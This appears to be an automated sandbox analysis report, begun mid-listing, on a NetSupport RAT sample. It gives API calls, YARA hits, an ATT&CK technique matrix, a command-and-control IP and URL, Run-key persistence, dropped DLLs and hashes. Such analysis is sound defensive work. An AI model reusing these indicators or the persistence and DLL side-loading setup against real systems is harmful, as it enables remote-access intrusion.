Code function: 0_2_003CA8E0 GetVersionExW,

0_2_003CA8E0

Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	6_2_11070090
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	6_2_110D8200
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5DA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,	6_2_6C5DA980
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	7_2_11070090
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	7_2_110D8200

Source: Yara match	File source: 10.2.bild.exe.6cee0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.bild.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.bild.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.bild.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.bild.exe.6e350000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.bild.exe.6e350000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.bild.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.bild.exe.6e350000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.bild.exe.6e350000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.bild.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.bild.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe.4fbb800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.bild.exe.6cee0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.bild.exe.6c5d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.bild.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.bild.exe.6cee0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.bild.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.bild.exe.6cee0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2163282550.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2160770098.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2246542222.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2325321884.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2053735718.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2241928402.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.2323620387.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe PID: 1100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bild.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bild.exe PID: 7388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bild.exe PID: 7612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bild.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\bild.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Input Capture	12 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	4 Native API	1 DLL Side-Loading	2 Valid Accounts	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	22 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	2 Valid Accounts	21 Access Token Manipulation	2 Software Packing	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Windows Service	1 Windows Service	1 DLL Side-Loading	NTDS	44 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Registry Run Keys / Startup Folder	13 Process Injection	1 Masquerading	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	13 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	58%	ReversingLabs	Win32.Trojan.NetSupport

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Netstat\HTCTL32.DLL	3%	ReversingLabs
C:\Users\Public\Netstat\PCICHEK.DLL	3%	ReversingLabs
C:\Users\Public\Netstat\PCICL32.DLL	12%	ReversingLabs
C:\Users\Public\Netstat\TCCTL32.DLL	3%	ReversingLabs
C:\Users\Public\Netstat\bild.exe	29%	ReversingLabs	Win32.Trojan.NetSupport
C:\Users\Public\Netstat\msvcr100.dll	0%	ReversingLabs
C:\Users\Public\Netstat\pcicapi.dll	3%	ReversingLabs
C:\Users\Public\Netstat\remcmdstub.exe	13%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://%s/testpage.htmwininet.dll	0%	Avira URL Cloud	safe
http://www.pci.co.uk/support	0%	Avira URL Cloud	safe
http://%s/testpage.htm	0%	Avira URL Cloud	safe
http://%s/fakeurl.htm	0%	Avira URL Cloud	safe
http://www.netsupportschool.com/tutor-assistant.asp	0%	Avira URL Cloud	safe
http://45.76.253.210/fakeurl.htm	0%	Avira URL Cloud	safe
http://127.0.0.1RESUMEPRINTING	0%	Avira URL Cloud	safe
http://www.pci.co.uk/supportsupport	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geo.netsupportsoftware.com	104.26.0.231	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.76.253.210/fakeurl.htm	true	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.asp	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://geo.netsupportsoftware.com/location/loca.asp_	bild.exe, 00000006.00000002.3898386960.00000000010AB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.pci.co.uk/support	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://%s/testpage.htmwininet.dll	bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false		high
http://www.pci.co.uk/supportsupport	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	false		high
http://geo.netsupportsoftware.com/location/loca.asp~	bild.exe, 00000006.00000002.3898386960.00000000010CC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://127.0.0.1RESUMEPRINTING	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.aspo	bild.exe, 00000006.00000002.3898386960.00000000010C3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://%s/testpage.htm	bild.exe, bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://www.netsupportschool.com/tutor-assistant.asp11(	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false		high
http://geo.netsupportsoftware.com/location/loca.aspV	bild.exe, 00000006.00000002.3898386960.00000000010CC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://127.0.0.1	bild.exe, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false		high
http://geo.netsupportsoftware.com/location/loca.aspt	bild.exe, 00000006.00000002.3898386960.00000000010CC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	false		high
http://www.netsupportschool.com/tutor-assistant.asp	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://%s/fakeurl.htm	bild.exe, bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.76.253.210	unknown	United States		20473	AS-CHOOPAUS	true
104.26.0.231	geo.netsupportsoftware.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580475
Start date and time:	2024-12-24 17:46:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Detection:	MAL
Classification:	mal96.rans.evad.winEXE@14/12@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 81% Number of executed functions: 209 Number of non-executed functions: 155
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Simulations

Behavior and APIs

Time	Type	Description
17:47:52	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\bild.exe
17:48:00	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\bild.exe
17:48:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\bild.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.0.231	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse	geo.netsupportsoftware.com/location/loca.asp
	5j0fix05fy.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	lFxGd66yDa.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geo.netsupportsoftware.com	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse	104.26.0.231
	5j0fix05fy.js	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	Merge.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	lFxGd66yDa.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	104.26.0.231
	5q1Wm5VlqL.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	Update.js	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	armv5l.elf	Get hash	malicious	Mirai	Browse	66.42.103.144
	jklm68k.elf	Get hash	malicious	Unknown	Browse	44.40.163.25
	nabsh4.elf	Get hash	malicious	Unknown	Browse	44.172.196.44
	nabarm5.elf	Get hash	malicious	Unknown	Browse	217.163.30.244
	nklx86.elf	Get hash	malicious	Unknown	Browse	45.76.237.246
	nklppc.elf	Get hash	malicious	Unknown	Browse	173.199.121.211
	armv6l.elf	Get hash	malicious	Unknown	Browse	44.168.169.170
	arm7.elf	Get hash	malicious	Mirai	Browse	44.168.169.177
	nsharm5.elf	Get hash	malicious	Mirai	Browse	45.32.145.147
CLOUDFLARENETUS	datasett.exe	Get hash	malicious	Unknown	Browse	104.26.3.46
	https://tb.ldpdljrr.ru/	Get hash	malicious	Unknown	Browse	104.21.30.230
	installer.msi	Get hash	malicious	Unknown	Browse	172.67.196.179
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.88.181
	badvbscript.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1	Get hash	malicious	Unknown	Browse	172.67.201.143
	https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	vce exam simulator 2.2.1 crackk.exe	Get hash	malicious	LummaC	Browse	104.21.33.227
	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.199.72

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Netstat\PCICHEK.DLL	https://tekascend.com/Ray-verify.html	Get hash	malicious	NetSupport RAT	Browse
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer	Browse
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse
	lFxGd66yDa.exe	Get hash	malicious	NetSupport RAT	Browse
	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse
	5q1Wm5VlqL.exe	Get hash	malicious	NetSupport RAT	Browse
	file.exe	Get hash	malicious	NetSupport RAT	Browse
	file.exe	Get hash	malicious	NetSupport RAT	Browse
C:\Users\Public\Netstat\HTCTL32.DLL	https://tekascend.com/Ray-verify.html	Get hash	malicious	NetSupport RAT	Browse
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer	Browse
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse
	lFxGd66yDa.exe	Get hash	malicious	NetSupport RAT	Browse
	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse
	5q1Wm5VlqL.exe	Get hash	malicious	NetSupport RAT	Browse
	file.exe	Get hash	malicious	NetSupport RAT	Browse
	file.exe	Get hash	malicious	NetSupport RAT	Browse

Created / dropped Files

C:\Users\Public\Netstat\HTCTL32.DLL

Download File

Process:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328056
Entropy (8bit):	6.754723001562745
Encrypted:	false
SSDEEP:	6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
MD5:	2D3B207C8A48148296156E5725426C7F
SHA1:	AD464EB7CF5C19C8A443AB5B590440B32DBC618F
SHA-256:	EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
SHA-512:	55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\HTCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
